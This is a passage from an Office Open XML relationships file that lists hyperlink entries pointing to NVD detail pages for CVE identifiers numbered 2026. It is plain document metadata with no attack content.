Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45378" TargetMode="External" Id="rId2601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45416" TargetMode="External" Id="rId2602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45698" TargetMode="External" Id="rId2603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45736" TargetMode="External" Id="rId2604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45741" TargetMode="External" Id="rId2605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45742" TargetMode="External" Id="rId2606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45747" TargetMode="External" Id="rId2607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45759" TargetMode="External" Id="rId2608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45762" TargetMode="External" Id="rId2609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45765" TargetMode="External" Id="rId2610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45766" TargetMode="External" Id="rId2611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45768" TargetMode="External" Id="rId2612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45769" TargetMode="External" Id="rId2613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45770" TargetMode="External" Id="rId2614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45798" TargetMode="External" Id="rId2615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46340" TargetMode="External" Id="rId2616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46343" TargetMode="External" Id="rId2617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46369" TargetMode="External" Id="rId2618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46387" TargetMode="External" Id="rId2619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46579" TargetMode="External" Id="rId2620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46625" TargetMode="External" Id="rId2621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47249" TargetMode="External" Id="rId2622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47625" TargetMode="External" Id="rId2623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47885" TargetMode="External" Id="rId2624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47886" TargetMode="External" Id="rId2625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47888" TargetMode="External" Id="rId2626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47889" TargetMode="External" Id="rId2627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47895" TargetMode="External" Id="rId2628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48043" TargetMode="External" Id="rId2629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48486" TargetMode="External" Id="rId2630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48779" TargetMode="External" Id="rId2631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48804" TargetMode="External" Id="rId2632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48888" TargetMode="External" Id="rId2633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4926" TargetMode="External" Id="rId2634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49362" TargetMode="External" Id="rId2635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49363" TargetMode="External" Id="rId2636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50010" TargetMode="External" Id="rId2637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50011" TargetMode="External" Id="rId2638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50142" TargetMode="External" Id="rId2639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50578" TargetMode="External" Id="rId2640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50776" TargetMode="External" Id="rId2641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51367" TargetMode="External" Id="rId2642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52023" TargetMode="External" Id="rId2643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52481" TargetMode="External" Id="rId2644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52770" TargetMode="External" Id="rId2645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52829" TargetMode="External" Id="rId2646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52856" TargetMode="External" Id="rId2647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52878" TargetMode="External" Id="rId2648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52879" TargetMode="External" Id="rId2649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52880" TargetMode="External" Id="rId2650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53503" TargetMode="External" Id="rId2651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53504" TargetMode="External" Id="rId2652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53505" TargetMode="External" Id="rId2653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53587" TargetMode="External" Id="rId2654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53599" TargetMode="External" Id="rId2655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54293" TargetMode="External" Id="rId2656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54598" TargetMode="External" Id="rId2657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54599" TargetMode="External" Id="rId2658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54638" TargetMode="External" Id="rId2659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54788" TargetMode="External" Id="rId2660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55099" TargetMode="External" Id="rId2661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55215" TargetMode="External" Id="rId2662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55484" TargetMode="External" Id="rId2663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55524" TargetMode="External" Id="rId2664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55525" TargetMode="External" Id="rId2665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55552" TargetMode="External" Id="rId2666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55553" TargetMode="External" Id="rId2667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55584" TargetMode="External" Id="rId2668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55620" TargetMode="External" Id="rId2669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55784" TargetMode="External" Id="rId2670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55841" TargetMode="External" Id="rId2671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56671" TargetMode="External" Id="rId2672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56673" TargetMode="External" Id="rId2673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5680" TargetMode="External" Id="rId2674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56845" TargetMode="External" Id="rId2675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId2676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57099" TargetMode="External" Id="rId2677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58011" TargetMode="External" Id="rId2678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58015" TargetMode="External" Id="rId2679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5946" TargetMode="External" Id="rId2680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59902" TargetMode="External" Id="rId2681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61686" TargetMode="External" Id="rId2682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62295" TargetMode="External" Id="rId2683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62296" TargetMode="External" Id="rId2684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62317" TargetMode="External" Id="rId2685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId2686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62813" TargetMode="External" Id="rId2687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6285" TargetMode="External" Id="rId2688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62999" TargetMode="External" Id="rId2689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6321" TargetMode="External" Id="rId2690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6322" TargetMode="External" Id="rId2691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63222" TargetMode="External" Id="rId2692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63408" TargetMode="External" Id="rId2693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63421" TargetMode="External" Id="rId2694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63462" TargetMode="External" Id="rId2695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63495" TargetMode="External" Id="rId2696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6377" TargetMode="External" Id="rId2697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64374" TargetMode="External" Id="rId2698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65819" TargetMode="External" Id="rId2699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65984" TargetMode="External" Id="rId2700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId2701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId2702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66373" TargetMode="External" Id="rId2703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId2704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67422" TargetMode="External" Id="rId2705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67865" TargetMode="External" Id="rId2706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67918" TargetMode="External" Id="rId2707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67977" TargetMode="External" Id="rId2708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67991" TargetMode="External" Id="rId2709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68005" TargetMode="External" Id="rId2710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68500" TargetMode="External" Id="rId2711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6857" TargetMode="External" Id="rId2712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId2713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6893" TargetMode="External" Id="rId2714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69185" TargetMode="External" Id="rId2715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId2716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69329" TargetMode="External" Id="rId2717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId2718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69378" TargetMode="External" Id="rId2719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId2720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId2721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69429" TargetMode="External" Id="rId2722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId2723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId2724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId2725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69587" TargetMode="External" Id="rId2726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69588" TargetMode="External" Id="rId2727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId2728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId2729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69631" TargetMode="External" Id="rId2730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69710" TargetMode="External" Id="rId2731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69739" TargetMode="External" Id="rId2732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69744" TargetMode="External" Id="rId2733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69760" TargetMode="External" Id="rId2734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69793" TargetMode="External" Id="rId2735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId2736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId2737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69805" TargetMode="External" Id="rId2738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69809" TargetMode="External" Id="rId2739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId2740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId2741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId2742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId2743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId2744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId2745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId2746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70570" TargetMode="External" Id="rId2747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70579" TargetMode="External" Id="rId2748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId2749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70601" TargetMode="External" Id="rId2750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71092" TargetMode="External" Id="rId2751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71314" TargetMode="External" Id="rId2752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71316" TargetMode="External" Id="rId2753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71321" TargetMode="External" Id="rId2754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId2755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71360" TargetMode="External" Id="rId2756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71488" TargetMode="External" Id="rId2757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71626" TargetMode="External" Id="rId2758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72871" TargetMode="External" Id="rId2759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72914" TargetMode="External" Id="rId2760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72915" TargetMode="External" Id="rId2761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72923" TargetMode="External" Id="rId2762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId2763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72932" TargetMode="External" Id="rId2764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72943" TargetMode="External" Id="rId2765" /><Relationship 